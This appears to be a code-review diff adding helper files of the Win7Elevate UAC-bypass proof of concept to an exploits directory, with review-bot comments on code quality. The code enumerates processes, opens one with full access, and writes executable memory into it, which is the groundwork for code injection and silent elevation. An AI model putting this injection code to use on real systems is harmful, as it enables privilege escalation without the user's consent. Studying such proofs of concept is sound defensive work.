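Review bot: The `AttemptOperation` declaration takes ten parameters and carries no comment, so a reader has to open the .cpp to learn what `bInject`, `bElevate` and `Redirector` control. A short header comment above the declaration would cover it: `bInject` chooses between running the file-operation routine in the current process and in the process identified by `dwPid`/`szProcName`. `bElevate` selects the elevation moniker instead of a plain `CoCreateInstance`, and `Redirector`, when non-null, is called once after the remote thread has been created. `hWnd` appears to be used only by the commented-out `MessageBox` calls and the call into `OpenProcessToInject`, which is worth stating too.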
@ -0,0 +1,347 @@
|
|||
#include "stdafx.h"
|
||||
#include "Win7Elevate_Utils.h"
|
||||
|
||||
#include ".\..\CMMN.h"
|
||||
|
||||
// All code (except for GetElevationType) (C) Leo Davidson, 8th February 2009, all rights reserved.
|
||||
// (Minor tidy-up 12th June 2009 for the code's public release.)
|
||||
// http://www.pretentiousname.com
|
||||
// leo@ox.compsoc.net
|
||||
//
|
||||
// Using any part of this code for malicious purposes is expressly forbidden.
|
||||
//
|
||||
// This proof-of-concept code is intended only to demonstrate that code-injection
|
||||
// poses a real problem with the default UAC settings in Windows 7 (tested with RC1 build 7100).
|
||||
//
|
||||
// Win7Elevate_Inject.cpp is the most interesting file. Most of the rest is just boilerplate UI/util code.
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs)
|
||||
{
|
||||
// Note: We probably need to target a process which has the same ASLR setting as us, i.e. ON.
|
||||
// Explorer.exe is our default since it has ASLR on, is always running and can do the COM silent-elevation stuff by default.
|
||||
|
||||
bool bResult = false;
|
||||
|
||||
mapProcs.clear();
|
||||
|
||||
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||
|
||||
if (hSnapshot == INVALID_HANDLE_VALUE)
|
||||
{
|
||||
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
|
||||
}
|
||||
else
|
||||
{
|
||||
bool bFirst = true;
|
||||
PROCESSENTRY32 pe;
|
||||
|
||||
while(true)
|
||||
{
|
||||
ZeroMemory(&pe, sizeof(pe));
|
||||
pe.dwSize = sizeof(pe);
|
||||
|
||||
BOOL bPR = FALSE;
|
||||
|
||||
if (bFirst)
|
||||
{
|
||||
bFirst = false;
|
||||
bPR = Process32First(hSnapshot, &pe);
|
||||
}
|
||||
else
|
||||
{
|
||||
bPR = Process32Next(hSnapshot, &pe);
|
||||
}
|
||||
|
||||
if (!bPR)
|
||||
{
|
||||
DWORD dwErr = GetLastError();
|
||||
|
||||
if (ERROR_NO_MORE_FILES != dwErr)
|
||||
{
|
||||
//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Process32Next/First failed");
|
||||
}
|
||||
else if (mapProcs.empty())
|
||||
{
|
||||
//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Process32Next/First returned nothing");
|
||||
}
|
||||
else
|
||||
{
|
||||
bResult = true;
|
||||
}
|
||||
|
||||
break; // Stop enumerating.
|
||||
}
|
||||
|
||||
// Only insert processes that we can open
|
||||
|
||||
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID);
|
||||
|
||||
if (hProc != 0)
|
||||
{
|
||||
CloseHandle(hProc);
|
||||
mapProcs.insert( std::make_pair( pe.th32ProcessID, pe.szExeFile ) );
|
||||
}
|
||||
}
|
||||
|
||||
CloseHandle(hSnapshot);
|
||||
}
|
||||
|
||||
return bResult;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName)
|
||||
{
|
||||
*pOutProcHandle = 0;
|
||||
|
||||
if (szProcName == NULL)
|
||||
{
|
||||
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"No process name passed in");
|
||||
return false;
|
||||
}
|
||||
|
||||
*pOutProcHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
|
||||
|
||||
if (*pOutProcHandle == 0)
|
||||
{
|
||||
DWORD dwError = GetLastError();
|
||||
|
||||
wchar_t szPID[128];
|
||||
_itow_s(dwPid, szPID, _countof(szPID), 10);
|
||||
|
||||
wchar_t szError[128];
|
||||
_itow_s(dwError, szError, _countof(szError), 10);
|
||||
|
||||
std::wstring strMsg = L"Couldn't open process ";
|
||||
strMsg += szProcName;
|
||||
strMsg += L" (pid: ";
|
||||
strMsg += szPID;
|
||||
strMsg += L") ";
|
||||
|
||||
if (dwError == ERROR_ACCESS_DENIED)
|
||||
{
|
||||
strMsg += L"ERROR_ACCESS_DENIED\n(We probably tried to inject into an elevated process\nwhich isn't allowed unless we're also elevated.\nPick an unelevated process.)";
|
||||
}
|
||||
else
|
||||
{
|
||||
strMsg += L"error ";
|
||||
strMsg += szError;
|
||||
}
|
||||
|
||||
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(strMsg);
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
W7EUtils::CTempResource::CTempResource(HINSTANCE hInstance, int iResourceId)
|
||||
: m_hInstance(hInstance)
|
||||
, m_iResourceId(iResourceId)
|
||||
{
|
||||
}
|
||||
|
||||
// virtual
|
||||
W7EUtils::CTempResource::~CTempResource()
|
||||
{
|
||||
if (!m_strFilePath.empty())
|
||||
{
|
||||
DeleteFile(m_strFilePath.c_str());
|
||||
m_strFilePath.clear();
|
||||
}
|
||||
m_iResourceId = 0;
|
||||
}
|
||||
|
||||
bool W7EUtils::CTempResource::GetFilePath(std::wstring &strPath)
|
||||
{
|
||||
if (m_strFilePath.empty())
|
||||
{
|
||||
wchar_t szTempPath[MAX_PATH];
|
||||
|
||||
DWORD dwTemp = GetTempPath(_countof(szTempPath), szTempPath);
|
||||
|
||||
if (dwTemp != 0 && dwTemp < _countof(szTempPath))
|
||||
{
|
||||
HRSRC hResource = FindResource(m_hInstance, MAKEINTRESOURCE(m_iResourceId), L"BINARY");
|
||||
|
||||
if (hResource)
|
||||
{
|
||||
HGLOBAL hLoadedResource = LoadResource(m_hInstance, hResource);
|
||||
|
||||
if (hLoadedResource)
|
||||
{
|
||||
LPVOID pLockedResource = LockResource(hLoadedResource);
|
||||
|
||||
if (pLockedResource)
|
||||
{
|
||||
DWORD dwResourceSize = SizeofResource(m_hInstance, hResource);
|
||||
|
||||
if (0 != dwResourceSize)
|
||||
{
|
||||
wchar_t szTempFilePath[MAX_PATH];
|
||||
|
||||
if (0 != GetTempFileName(szTempPath, L"w7e", 0, szTempFilePath))
|
||||
{
|
||||
HANDLE hFile = CreateFile(szTempFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
|
||||
if (INVALID_HANDLE_VALUE != hFile)
|
||||
{
|
||||
DWORD dwBytesWritten = 0;
|
||||
|
||||
if (WriteFile(hFile, pLockedResource, dwResourceSize, &dwBytesWritten, NULL)
|
||||
&& dwBytesWritten == dwResourceSize)
|
||||
{
|
||||
m_strFilePath = szTempFilePath;
|
||||
}
|
||||
|
||||
CloseHandle(hFile);
|
||||
|
||||
if (m_strFilePath.empty())
|
||||
{
|
||||
DeleteFile(szTempFilePath);
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
if (!m_strFilePath.empty())
|
||||
{
|
||||
strPath = m_strFilePath;
|
||||
return true;
|
||||
}
|
||||
|
||||
strPath.clear();
|
||||
return false;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
W7EUtils::CRemoteMemory::CRemoteMemory(HANDLE hRemoteProcess)
|
||||
: m_hRemoteProcess(hRemoteProcess)
|
||||
, m_bAnyFailures(false)
|
||||
{
|
||||
}
|
||||
|
||||
// virtual
|
||||
W7EUtils::CRemoteMemory::~CRemoteMemory()
|
||||
{
|
||||
while(!m_listRemoteAllocations.empty())
|
||||
{
|
||||
VirtualFreeEx(m_hRemoteProcess, m_listRemoteAllocations.back(), 0, MEM_RELEASE);
|
||||
m_listRemoteAllocations.pop_back();
|
||||
}
|
||||
}
|
||||
|
||||
void W7EUtils::CRemoteMemory::LeakMemory()
|
||||
{
|
||||
m_listRemoteAllocations.clear();
|
||||
}
|
||||
|
||||
bool W7EUtils::CRemoteMemory::AnyFailures() const
|
||||
{
|
||||
return m_bAnyFailures;
|
||||
}
|
||||
|
||||
void *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst)
|
||||
{
|
||||
void *pRemoteAllocation = VirtualAllocEx(m_hRemoteProcess, 0, bufferSize, MEM_COMMIT | PAGE_READWRITE, bExecutable ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE);
|
||||
|
||||
if (pRemoteAllocation)
|
||||
{
|
||||
DWORD dwOldProtect = 0;
|
||||
|
||||
if (!WriteProcessMemory(m_hRemoteProcess, pRemoteAllocation, pLocalBuffer, bufferSize, NULL)
|
||||
|| (!bExecutable && !bConst && !VirtualProtectEx(m_hRemoteProcess, pRemoteAllocation, bufferSize, bExecutable ? PAGE_EXECUTE_READ : PAGE_READONLY, &dwOldProtect)))
|
||||
{
|
||||
VirtualFreeEx(m_hRemoteProcess, pRemoteAllocation, 0, MEM_RELEASE);
|
||||
pRemoteAllocation = 0;
|
||||
}
|
||||
else
|
||||
{
|
||||
m_listRemoteAllocations.push_back(pRemoteAllocation);
|
||||
}
|
||||
}
|
||||
|
||||
if (pRemoteAllocation == 0)
|
||||
{
|
||||
m_bAnyFailures = true;
|
||||
}
|
||||
|
||||
return pRemoteAllocation;
|
||||
}
|
||||
|
||||
wchar_t *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst)
|
||||
{
|
||||
return reinterpret_cast< wchar_t * >(
|
||||
this->AllocAndCopyMemory(
|
||||
reinterpret_cast< const void * >( szLocalString ),
|
||||
(wcslen(szLocalString)+1) * sizeof(szLocalString[0]),
|
||||
false, bConst ) );
|
||||
}
|
||||
|
||||
char *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const char *szLocalString, bool bConst)
|
||||
{
|
||||
return reinterpret_cast< char * >(
|
||||
this->AllocAndCopyMemory(
|
||||
reinterpret_cast< const void * >( szLocalString ),
|
||||
(strlen(szLocalString)+1) * sizeof(szLocalString[0]),
|
||||
false, bConst ) );
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
// GetElevationType slightly modified from original by Andrei Belogortseff
|
||||
// From http://stackoverflow.com/questions/95912/how-can-i-detect-if-my-process-is-running-uac-elevated-or-not
|
||||
bool W7EUtils::GetElevationType(TOKEN_ELEVATION_TYPE * ptet)
|
||||
{
|
||||
bool bResult = false;
|
||||
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
|
||||
{
|
||||
DWORD dwReturnLength = 0;
|
||||
|
||||
if (GetTokenInformation(hToken, TokenElevationType, ptet, sizeof(*ptet), &dwReturnLength ))
|
||||
{
|
||||
assert(dwReturnLength == sizeof(*ptet));
|
||||
bResult = true;
|
||||
}
|
||||
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
|
||||
return bResult;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
|
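Review bot: In `OpenProcessToInject`, `_itow_s(dwPid, ...)` and `_itow_s(dwError, ...)` pass `DWORD` values through an `int` parameter, so any value above `INT_MAX` is logged as a negative number. The failure message then no longer matches the real PID or `GetLastError()` code. Use the unsigned variant for both: `_ultow_s(dwPid, szPID, _countof(szPID), 10);` and `_ultow_s(dwError, szError, _countof(szError), 10);`. The 128-element buffers are already larger than a 32-bit decimal needs, so nothing else has to change.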
@ -0,0 +1,54 @@
|
|||
#pragma once
|
||||
|
||||
namespace W7EUtils
|
||||
{
|
||||
bool GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs);
|
||||
|
||||
bool OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName);
|
||||
|
||||
bool GetElevationType(TOKEN_ELEVATION_TYPE * ptet);
|
||||
|
||||
template < typename T > class GetProcAddr
|
||||
{
|
||||
public:
|
||||
T f;
|
||||
|
||||
__forceinline GetProcAddr(FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName), HMODULE hModule, const char *lpProcName)
|
||||
{
|
||||
f = reinterpret_cast< T >(fpGetProcAddress(hModule, lpProcName));
|
||||
}
|
||||
};
|
||||
|
||||
class CTempResource
|
||||
{
|
||||
private:
|
||||
HINSTANCE m_hInstance;
|
||||
int m_iResourceId;
|
||||
std::wstring m_strFilePath;
|
||||
public:
|
||||
CTempResource(HINSTANCE hInstance, int iResourceId);
|
||||
virtual ~CTempResource();
|
||||
bool GetFilePath(std::wstring &strPath);
|
||||
};
|
||||
|
||||
class CRemoteMemory
|
||||
{
|
||||
private:
|
||||
HANDLE m_hRemoteProcess;
|
||||
std::list< void * > m_listRemoteAllocations;
|
||||
bool m_bAnyFailures;
|
||||
|
||||
private:
|
||||
CRemoteMemory(const CRemoteMemory &rhs); // Disallow.
|
||||
CRemoteMemory &operator=(const CRemoteMemory &rhs); // Disallow.
|
||||
|
||||
public:
|
||||
CRemoteMemory(HANDLE hRemoteProcess);
|
||||
virtual ~CRemoteMemory();
|
||||
void LeakMemory();
|
||||
bool AnyFailures() const;
|
||||
void *AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst = true);
|
||||
wchar_t *AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst = true);
|
||||
char *AllocAndCopyMemory(const char *szLocalString, bool bConst = true);
|
||||
};
|
||||
}
|
|
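Review bot: `CTempResource` deletes the file named by `m_strFilePath` in its destructor, but unlike `CRemoteMemory` just below it leaves the compiler-generated copy constructor and assignment operator available. A copy would delete the temp file while the original still hands out its path as valid. Declare both private and unimplemented, as `CRemoteMemory` does: `CTempResource(const CTempResource &rhs); // Disallow.` and `CTempResource &operator=(const CTempResource &rhs); // Disallow.`. Separately, the header uses `std::map`, `std::list` and `std::wstring` without including them, so it presumably relies on `stdafx.h` being included first; a one-line comment at the top should say so.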
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// Win7Elevate.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,44 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
|
||||
#if defined _M_IX86
|
||||
|
||||
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
|
||||
|
||||
#elif defined _M_X64
|
||||
|
||||
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"")
|
||||
|
||||
#endif
|
||||
|
||||
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
#include <commctrl.h>
|
||||
#include <shlobj.h>
|
||||
|
||||
#include <Tlhelp32.h>
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <tchar.h>
|
||||
#include <assert.h>
|
||||
|
||||
#include <string>
|
||||
#include <list>
|
||||
#include <map>
|
||||
|
||||
#ifndef FOFX_REQUIREELEVATION
|
||||
#define FOFX_REQUIREELEVATION (0x10000000)
|
||||
#endif
|
||||
|
||||
#ifndef FOFX_DONTDISPLAYLOCATIONS
|
||||
#define FOFX_DONTDISPLAYLOCATIONS (0x80000000)
|
||||
#endif
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
|
@ -0,0 +1,6 @@
|
|||
// Win7ElevateDll.cpp : Defines the exported functions for the DLL application.
|
||||
//
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
|
|
@ -0,0 +1,179 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{A1814C92-4DA6-440C-811E-86016AB7433A}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>Win7ElevateDll</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\CMMN.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
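--- a/external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.filters
+++ b/external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.filters
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup>
+<Filter Include="Source Files">
+<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+</Filter>
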